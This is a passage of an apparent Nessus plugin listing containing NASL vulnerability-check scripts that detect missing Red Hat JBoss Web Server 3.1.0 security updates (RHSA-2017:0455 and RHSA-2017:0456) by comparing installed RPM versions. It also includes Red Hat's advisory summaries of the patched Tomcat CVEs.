      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat-vault");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsvc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-lib");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-selinux");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-admin-webapps");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-docs-webapp");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-el-2.2-api");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-javadoc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsp-2.3-api");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsvc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-lib");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-log4j");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-selinux");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-servlet-3.1-api");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-webapps");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2016/07/04");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/03/07");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/08");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Red Hat Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
    os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
    os_ver = os_ver[1];
    if (! preg(pattern:"^6([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 6.x", "Red Hat " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
    
    yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
    if (!empty_or_null(yum_updateinfo)) 
    {
      rhsa = "RHSA-2017:0455";
      yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
      if (!empty_or_null(yum_report))
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_HOLE,
          extra      : yum_report 
        );
        exit(0);
      }
      else
      {
        audit_message = "affected by Red Hat security advisory " + rhsa;
        audit(AUDIT_OS_NOT, audit_message);
      }
    }
    else
    {
      flag = 0;
      if (rpm_check(release:"RHEL6", reference:"hibernate4-c3p0-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"hibernate4-core-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"hibernate4-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"hibernate4-entitymanager-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"hibernate4-envers-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"jbcs-httpd24-apache-commons-daemon-1.0.15-1.redhat_2.1.jbcs.el6")) flag++;
      if (rpm_check(release:"RHEL6", cpu:"i686", reference:"jbcs-httpd24-apache-commons-daemon-jsvc-1.0.15-17.redhat_2.jbcs.el6")) flag++;
      if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"jbcs-httpd24-apache-commons-daemon-jsvc-1.0.15-17.redhat_2.jbcs.el6")) flag++;
      if (rpm_check(release:"RHEL6", cpu:"i686", reference:"jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo-1.0.15-17.redhat_2.jbcs.el6")) flag++;
      if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo-1.0.15-17.redhat_2.jbcs.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"jbcs-httpd24-runtime-1-3.jbcs.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"mod_cluster-1.3.5-2.Final_redhat_2.1.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"mod_cluster-tomcat7-1.3.5-2.Final_redhat_2.1.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"mod_cluster-tomcat8-1.3.5-2.Final_redhat_2.1.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", cpu:"i686", reference:"tomcat-native-1.2.8-9.redhat_9.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"tomcat-native-1.2.8-9.redhat_9.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", cpu:"i686", reference:"tomcat-native-debuginfo-1.2.8-9.redhat_9.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"tomcat-native-debuginfo-1.2.8-9.redhat_9.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat-vault-1.0.8-9.Final_redhat_2.1.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat7-7.0.70-16.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat7-admin-webapps-7.0.70-16.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat7-docs-webapp-7.0.70-16.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat7-el-2.2-api-7.0.70-16.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat7-javadoc-7.0.70-16.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat7-jsp-2.2-api-7.0.70-16.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat7-jsvc-7.0.70-16.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat7-lib-7.0.70-16.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat7-log4j-7.0.70-16.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat7-selinux-7.0.70-16.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat7-servlet-3.0-api-7.0.70-16.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat7-webapps-7.0.70-16.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat8-8.0.36-17.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat8-admin-webapps-8.0.36-17.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat8-docs-webapp-8.0.36-17.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat8-el-2.2-api-8.0.36-17.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat8-javadoc-8.0.36-17.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat8-jsp-2.3-api-8.0.36-17.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat8-jsvc-8.0.36-17.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat8-lib-8.0.36-17.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat8-log4j-8.0.36-17.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat8-selinux-8.0.36-17.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat8-servlet-3.1-api-8.0.36-17.ep7.el6")) flag++;
      if (rpm_check(release:"RHEL6", reference:"tomcat8-webapps-8.0.36-17.ep7.el6")) flag++;
    
      if (flag)
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_HOLE,
          extra      : rpm_report_get() + redhat_report_package_caveat()
        );
        exit(0);
      }
      else
      {
        tested = pkg_tests_get();
        if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
        else audit(AUDIT_PACKAGE_NOT_INSTALLED, "hibernate4-c3p0-eap6 / hibernate4-core-eap6 / hibernate4-eap6 / etc");
      }
    }
    
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-0456.NASL
    descriptionAn update is now available for Red Hat JBoss Web Server 3 for RHEL 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library. This release of Red Hat JBoss Web Server 3.1.0 serves as a replacement for Red Hat JBoss Web Server 3.0.3, and includes enhancements. Security Fix(es) : * It was reported that the Tomcat init script performed unsafe file handling, which could result in local privilege escalation. (CVE-2016-1240) * It was discovered that the Tomcat packages installed certain configuration files read by the Tomcat initialization script as writeable to the tomcat group. A member of the group or a malicious web application deployed on Tomcat could use this flaw to escalate their privileges. (CVE-2016-6325) * The JmxRemoteLifecycleListener was not updated to take account of Oracle
    last seen2020-06-01
    modified2020-06-02
    plugin id97596
    published2017-03-08
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97596
    titleRHEL 7 : Red Hat JBoss Web Server 3.1.0 (RHSA-2017:0456)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Red Hat Security Advisory RHSA-2017:0456. The text 
    # itself is copyright (C) Red Hat, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(97596);
      script_version("3.11");
      script_cvs_date("Date: 2019/10/24 15:35:42");
    
      script_cve_id("CVE-2016-0762", "CVE-2016-1240", "CVE-2016-3092", "CVE-2016-5018", "CVE-2016-6325", "CVE-2016-6794", "CVE-2016-6796", "CVE-2016-6797", "CVE-2016-6816", "CVE-2016-8735", "CVE-2016-8745");
      script_xref(name:"RHSA", value:"2017:0456");
    
      script_name(english:"RHEL 7 : Red Hat JBoss Web Server 3.1.0 (RHSA-2017:0456)");
      script_summary(english:"Checks the rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Red Hat host is missing one or more security updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "An update is now available for Red Hat JBoss Web Server 3 for RHEL 7.
    
    Red Hat Product Security has rated this update as having a security
    impact of Important. A Common Vulnerability Scoring System (CVSS) base
    score, which gives a detailed severity rating, is available for each
    vulnerability from the CVE link(s) in the References section.
    
    Red Hat JBoss Web Server is a fully integrated and certified set of
    components for hosting Java web applications. It is comprised of the
    Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat
    Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and
    the Tomcat Native library.
    
    This release of Red Hat JBoss Web Server 3.1.0 serves as a replacement
    for Red Hat JBoss Web Server 3.0.3, and includes enhancements.
    
    Security Fix(es) :
    
    * It was reported that the Tomcat init script performed unsafe file
    handling, which could result in local privilege escalation.
    (CVE-2016-1240)
    
    * It was discovered that the Tomcat packages installed certain
    configuration files read by the Tomcat initialization script as
    writeable to the tomcat group. A member of the group or a malicious
    web application deployed on Tomcat could use this flaw to escalate
    their privileges. (CVE-2016-6325)
    
    * The JmxRemoteLifecycleListener was not updated to take account of
    Oracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only
    included in EWS 2.x and JWS 3.x source distributions. If you deploy a
    Tomcat instance built from source, using the EWS 2.x, or JWS 3.x
    distributions, an attacker could use this flaw to launch a remote code
    execution attack on your deployed instance. (CVE-2016-8735)
    
    * A denial of service vulnerability was identified in Commons
    FileUpload that occurred when the length of the multipart boundary was
    just below the size of the buffer (4096 bytes) used to read the
    uploaded file if the boundary was the typical tens of bytes long.
    (CVE-2016-3092)
    
    * It was discovered that the code that parsed the HTTP request line
    permitted invalid characters. This could be exploited, in conjunction
    with a proxy that also permitted the invalid characters but with a
    different interpretation, to inject data into the HTTP response. By
    manipulating the HTTP response the attacker could poison a web-cache,
    perform an XSS attack, or obtain sensitive information from requests
    other then their own. (CVE-2016-6816)
    
    * A bug was discovered in the error handling of the send file code for
    the NIO HTTP connector. This led to the current Processor object being
    added to the Processor cache multiple times allowing information
    leakage between requests including, and not limited to, session ID and
    the response body. (CVE-2016-8745)
    
    * The Realm implementations did not process the supplied password if
    the supplied user name did not exist. This made a timing attack
    possible to determine valid user names. Note that the default
    configuration includes the LockOutRealm which makes exploitation of
    this vulnerability harder. (CVE-2016-0762)
    
    * It was discovered that a malicious web application could bypass a
    configured SecurityManager via a Tomcat utility method that was
    accessible to web applications. (CVE-2016-5018)
    
    * It was discovered that when a SecurityManager is configured Tomcat's
    system property replacement feature for configuration files could be
    used by a malicious web application to bypass the SecurityManager and
    read system properties that should not be visible. (CVE-2016-6794)
    
    * It was discovered that a malicious web application could bypass a
    configured SecurityManager via manipulation of the configuration
    parameters for the JSP Servlet. (CVE-2016-6796)
    
    * It was discovered that it was possible for a web application to
    access any global JNDI resource whether an explicit ResourceLink had
    been configured or not. (CVE-2016-6797)
    
    The CVE-2016-6325 issue was discovered by Red Hat Product Security.
    
    Enhancement(s) :
    
    * This enhancement update adds the Red Hat JBoss Web Server 3.1.0
    packages to Red Hat Enterprise Linux 7. These packages provide a
    number of enhancements over the previous version of Red Hat JBoss Web
    Server. (JIRA#JWS-268)"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/errata/RHSA-2017:0456"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-0762"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-1240"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-3092"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-5018"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-6325"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-6794"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-6796"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-6797"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-6816"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-8735"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2016-8745"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate4-c3p0-eap6");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon-jsvc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-runtime");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat7");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat8");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat-native");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat-native-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat-vault");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsvc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-lib");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-selinux");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-admin-webapps");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-docs-webapp");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-el-2.2-api");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-javadoc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsp-2.3-api");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsvc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-lib");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-log4j");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-selinux");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-servlet-3.1-api");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:tomcat8-webapps");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2016/07/04");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/03/07");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/08");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Red Hat Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
    os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
    os_ver = os_ver[1];
    if (! preg(pattern:"^7([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 7.x", "Red Hat " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
    
    yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
    if (!empty_or_null(yum_updateinfo)) 
    {
      rhsa = "RHSA-2017:0456";
      yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
      if (!empty_or_null(yum_report))
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_HOLE,
          extra      : yum_report 
        );
        exit(0);
      }
      else
      {
        audit_message = "affected by Red Hat security advisory " + rhsa;
        audit(AUDIT_OS_NOT, audit_message);
      }
    }
    else
    {
      flag = 0;
      if (rpm_check(release:"RHEL7", reference:"hibernate4-c3p0-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"hibernate4-core-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"hibernate4-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"hibernate4-entitymanager-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"hibernate4-envers-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"jbcs-httpd24-apache-commons-daemon-1.0.15-1.redhat_2.1.jbcs.el7")) flag++;
      if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"jbcs-httpd24-apache-commons-daemon-jsvc-1.0.15-17.redhat_2.jbcs.el7")) flag++;
      if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo-1.0.15-17.redhat_2.jbcs.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"jbcs-httpd24-runtime-1-3.jbcs.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"mod_cluster-1.3.5-2.Final_redhat_2.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"mod_cluster-tomcat7-1.3.5-2.Final_redhat_2.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"mod_cluster-tomcat8-1.3.5-2.Final_redhat_2.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"tomcat-native-1.2.8-9.redhat_9.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"tomcat-native-debuginfo-1.2.8-9.redhat_9.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat-vault-1.0.8-9.Final_redhat_2.1.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat7-7.0.70-16.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat7-admin-webapps-7.0.70-16.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat7-docs-webapp-7.0.70-16.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat7-el-2.2-api-7.0.70-16.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat7-javadoc-7.0.70-16.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat7-jsp-2.2-api-7.0.70-16.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat7-jsvc-7.0.70-16.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat7-lib-7.0.70-16.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat7-log4j-7.0.70-16.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat7-selinux-7.0.70-16.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat7-servlet-3.0-api-7.0.70-16.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat7-webapps-7.0.70-16.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat8-8.0.36-17.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat8-admin-webapps-8.0.36-17.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat8-docs-webapp-8.0.36-17.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat8-el-2.2-api-8.0.36-17.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat8-javadoc-8.0.36-17.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat8-jsp-2.3-api-8.0.36-17.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat8-jsvc-8.0.36-17.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat8-lib-8.0.36-17.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat8-log4j-8.0.36-17.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat8-selinux-8.0.36-17.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat8-servlet-3.1-api-8.0.36-17.ep7.el7")) flag++;
      if (rpm_check(release:"RHEL7", reference:"tomcat8-webapps-8.0.36-17.ep7.el7")) flag++;
    
      if (flag)
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_HOLE,
          extra      : rpm_report_get() + redhat_report_package_caveat()
        );
        exit(0);
      }
      else
      {
        tested = pkg_tests_get();
        if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
